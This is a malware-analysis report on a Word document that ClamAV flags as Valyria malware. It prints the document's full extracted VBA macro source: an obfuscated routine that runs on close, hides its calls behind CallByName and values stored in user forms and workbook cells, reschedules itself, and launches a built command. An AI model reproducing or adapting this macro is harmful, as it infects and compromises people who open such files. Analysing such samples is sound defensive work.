MALICIOUS
222
Risk Score
Heuristics 5
-
ClamAV: Doc.Malware.Valyria-10033904-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-10033904-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set d9hf = CreateObject(UserForm1.ComboBox1) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
x = CallByName(Application, k5eig, 2) -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9264 bytes |
SHA-256: 0ebd4a7fcbae279e5e802b080b403b97adae0693c94aca7b5b17a7fe0e532666 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public eiqw, bd, ey, ww9wp, wc
Sub Document_Close()
nnn
End Sub
Sub nnn()
On Error Resume Next
Application.DisplayAlerts = False
hvgel = Application.Options.UseGermanSpellingReform
Err.Number = 0
UserForm2.ComboBox1.ListIndex = 2
Dim d9hf
ei = Application.Options.AutoCreateNewDrawings
If hvgel > 1725 Then
c4v0w = Application.Options.MeasurementUnit
hvgel = c4v0w
End If
Set d9hf = CreateObject(UserForm1.ComboBox1)
d9hf.DisplayAlerts = False
k5eig = "visible"
d0 = "OnTime"
u4 = Application.CheckSpelling("ogt")
If ei > 3278 Then
ep = Application.Options.AutoFormatAsYouTypeReplaceOrdinals
ei = ep
End If
Dim gdrpn
k6 = 1
g14no = 1
While k6 <> 0 And g14no < 3
Set gdrpn = d9hf.Workbooks.Open(FileName:=UserForm2.ComboBox1, Password:=UserForm1.ComboBox2)
k6 = Err.Number
g14no = g14no + 1
Wend
If k6 <> 0 Then
u5 = Application.Options.AutoFormatMatchParentheses
If ogt > 2593 Then
c9pi = Application.Options.EnableHangulHanjaRecentOrdering
ogt = c9pi
End If
x = CallByName(Application, k5eig, 2)
If x = True Then
Set p3 = CreateObject(UserForm1.ComboBox3)
p3.Documents.Open ActiveDocument.FullName, ReadOnly:=True
p3.Run "ThisDocument.nnn"
Else
UserForm1.ComboBox4 = UserForm1.ComboBox4 & "0"
iwu = Application.Options.HebrewMode
If u5 > 1327 Then
nx7wm = Application.Options.HebrewMode
u5 = nx7wm
End If
Application.OnTime Now + TimeSerial(0, 0, 20), "ThisDocument.nnn"
End If
d9hf.Quit
Exit Sub
wid9h = Application.Options.ShowDiacritics
If iwu > 335 Then
f4f2f = Application.Options.CheckSpellingAsYouType
iwu = f4f2f
End If
End If
lw = Application.Options.AutoFormatAsYouTypeApplyNumberedLists
If wid9h > 344 Then
mt = Application.Options.ReplaceSelection
wid9h = mt
End If
Dim edh
Set edh = d9hf.sheets(1)
tp = "'"
wzz = d9hf.sheets(3).Cells(179, 27).Value
uq = Application.Build
If lw > 2040 Then
f8 = Application.Options.AutoFormatAsYouTypeFormatListItemBeginning
lw = f8
End If
bd = d9hf.sheets(2).Cells(49, 43).Value
eiqw = edh.Cells(230, 39).Value
m98 = d9hf.sheets(2).Cells(49, 14).Value
b36q = d9hf.sheets(3).Cells(109, 47).Value
aca4 = d9hf.sheets(3).Cells(9, 15).Value
q6 = d9hf.sheets(2).Cells(54, 5).Value
zk = d9hf.sheets(3).Cells(167, 36).Value
yg = d9hf.sheets(1).Cells(82, 4).Value
tcp = d9hf.sheets(2).Cells(208, 34).Value
mu = d9hf.sheets(1).Cells(133, 40).Value
mu6w8 = d9hf.sheets(3).Cells(148, 34).Value
d76f = d9hf.sheets(2).Cells(225, 43).Value
ar3 = d9hf.sheets(3).Cells(56, 6).Value
hv7g = d9hf.sheets(3).Cells(104, 4).Value
t9511 = d9hf.sheets(3).Cells(56, 7).Value
tr7j0 = edh.Cells(212, 41).Value
u1p = d9hf.sheets(2).Cells(192, 49).Value
t2 = edh.Cells(142, 19).Value
k10s = d9hf.sheets(3).Cells(99, 12).Value
paeo8 = edh.Cells(176, 2).Value
p2 = d9hf.sheets(2).Cells(221, 25).Value
wc = d9hf.sheets(1).Cells(119, 3).Value
ej3 = edh.Cells(70, 1).Value
eaoq = d9hf.sheets(2).Cells(36, 44).Value
sh = edh.Cells(220, 2).Value
m1 = CallByName(d9hf, wzz, 2)
Set bo = UserForm1.Controls.Add("Forms.ComboBox.1")
bo.Value = q6 & m1 & k10s
Set t9lfx = UserForm1.Controls.Add("Forms.ComboBox.1")
heog = Application.ProductCode
If uq > 2984 Then
ar3kq = Application.Options.SequenceCheck
uq = ar3kq
End If
t9lfx.Value = eaoq
CallByName CreateObject(mu), d76f, 1, bo, b36q, t9lfx
Set ejjww = CreateObject(p2)
Set k = CallByName(ejjww, hv7g, 2)
Set rnm = CallByName(k, paeo8, 1)
ijck = Application.Options.AutoKeyboardSwitching
If heog > 1704 Then
jr = Application.Options.MatchFuzzyKiKu
heog = jr
End If
Set u1p = CallByName(ejjww, u1p, 2)
Set ww9wp = ejjww
jw = Application.Options.InsertedTextColor
If ijck > 3730 Then
gmgg7 = Application.Options.InsertedTextColor
ijck = gmgg7
End If
hf = Application.Language
If jw > 59 Then
km4a = Application.Options.EnableSound
jw = km4a
End If
uln7l = Application.Options.ApplyFarEastFontsToAscii
If hf > 838 Then
zw87 = Application.Options.AddControlCharacters
hf = zw87
End If
uhj = Application.Options.AutoFormatApplyHeadings
If uln7l > 1720 Then
fxay8 = Application.Options.AutoFormatReplaceOrdinals
uln7l = fxay8
End If
Set m98 = CallByName(u1p, m98, 2)
Set yg = CallByName(m98, yg, 2)
Set a13re = CallByName(yg, sh, 1, t2)
Set eiqw = CallByName(a13re, eiqw, 2)
pgdqh = Application.Caption
If uhj > 4607 Then
udlbv = Application.Options.AutoFormatReplaceHyperlinks
uhj = udlbv
End If
r0 = Application.Options.AutoFormatApplyLists
ar3 = CallByName(eiqw, ar3, 2)
CallByName eiqw, mu6w8, 1, 1, ar3
Set ey = UserForm1.Controls.Add("Forms.ComboBox.1")
ey.Value = aca4 & tr7j0
au = Application.Options.AutoFormatAsYouTypeReplaceFarEastDashes
If r0 > 3477 Then
m0o1 = Application.Options.Creator
r0 = m0o1
End If
UserForm3.ComboBox1 = tcp
ey.Value = ej3
UserForm4.ComboBox1 = UserForm3.ComboBox1
UserForm3.ComboBox1 = ar3
dd2ep = Application.Options.BackgroundSave
If dx3mj > 2575 Then
v6fc2 = Application.Options.InterpretHighAnsi
dx3mj = v6fc2
dx3mj = Application.Options.ApplyFarEastFontsToAscii
If au > 4989 Then
avs3 = Application.Options.DocumentViewDirection
au = avs3
End If
End If
ejjww = Nothing
gdrpn = Nothing
wd8qp = Application.Options.IgnoreMixedDigits
If dd2ep > 3892 Then
sn8yj = Application.Options.PasteSmartCutPaste
dd2ep = sn8yj
End If
w3 = Application.Options.AutoFormatMatchParentheses
If wd8qp > 2843 Then
eelz = Application.Options.PasteMergeLists
wd8qp = eelz
End If
edh = Nothing
k = Nothing
rnm = Nothing
u1p = Nothing
ieu0 = Application.Options.CheckSpellingAsYouType
If w3 > 2227 Then
ajx = Application.Build
w3 = ajx
End If
pm = Application.Options.AutoFormatReplaceFractions
If ieu0 > 3301 Then
m = Application.ProductCode
ieu0 = m
End If
m98 = Nothing
yg = Nothing
a13re = Nothing
eiqw = Nothing
ww9wp = Nothing
DoEvents
b0x2 = Application.Options.MonthNames
If pm > 4190 Then
xjxc = Application.Options.Overtype
pm = xjxc
End If
qxm7u = Application.Options.AutoFormatReplaceQuotes
If b0x2 > 928 Then
h5uk8 = Application.CheckSpelling("sy4hu")
b0x2 = sy4hu
End If
CallByName d9hf, zk, 1
d9hf = Nothing
DoEvents
CallByName CreateObject(mu), t9511, 1, q6 & m1 & k10s
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{55FC1B56-8C48-43C5-83DC-5AE637103AF2}{63B04607-AA30-464F-8169-A78FBCC9D737}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{4169A098-DE23-466E-9F41-F3170B0318F3}{66C49382-2040-46FF-BB4C-553CD7065B29}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
On Error GoTo ErrorHandler
i08h5 = UserForm2.Controls.Count - 1
saqw2 = Application.Options.AllowReadingMode
r92t9 = Application.Options.ShowFormatError
If saqw2 > 1998 Then
cj8u = Application.Options.SnapToGrid
saqw2 = cj8u
End If
vxrjf = Application.Options.PromptUpdateStyle
If r92t9 > 3745 Then
v9xg = Application.Options.MatchFuzzyAY
r92t9 = v9xg
End If
y1 = Application.Options.SuggestFromMainDictionaryOnly
If vxrjf > 2013 Then
dpm = Application.Options.AutoFormatAsYouTypeAutoLetterWizard
vxrjf = dpm
End If
If Len(UserForm1.ComboBox4) > 10 Then
baf0 = Application.Options.MeasurementUnit
If y1 > 1347 Then
lie0f = Application.Options.AnimateScreenMovements
y1 = lie0f
End If
i08h5 = i08h5 * 2
End If
h8rc = ""
For vdodj = 1 To i08h5 Step 2
h8rc = h8rc & UserForm2.Controls.Item(vdodj)
Next
ComboBox1.AddItem "ek"
ComboBox1.AddItem "zo"
ComboBox1.AddItem h8rc
ComboBox1.AddItem "x9se1"
Exit Sub
ErrorHandler:
End Sub
Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{36D0FF89-E185-4315-9DE5-38FB10432377}{68C5F00F-B096-4158-9A5E-CC733515D6A0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
zlo1d = Application.Options.VisualSelection
CallByName ActiveDocument.eiqw, ActiveDocument.bd, VbMethod, ActiveDocument.ey
End Sub
Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{C1F19B49-80B2-4989-89E5-905F44275009}{6D73AE83-46A4-44F3-A4C0-A87218769CAE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
CallByName ActiveDocument.ww9wp, ActiveDocument.wc, VbMethod, ActiveDocument.ey
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 44032 bytes |
SHA-256: 2fafef0cde678b48a2840845a889ed7558c9f413a9b8ea80137dcc8e16849b09 |
|||
|
Detection
ClamAV:
Doc.Malware.Valyria-10033904-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.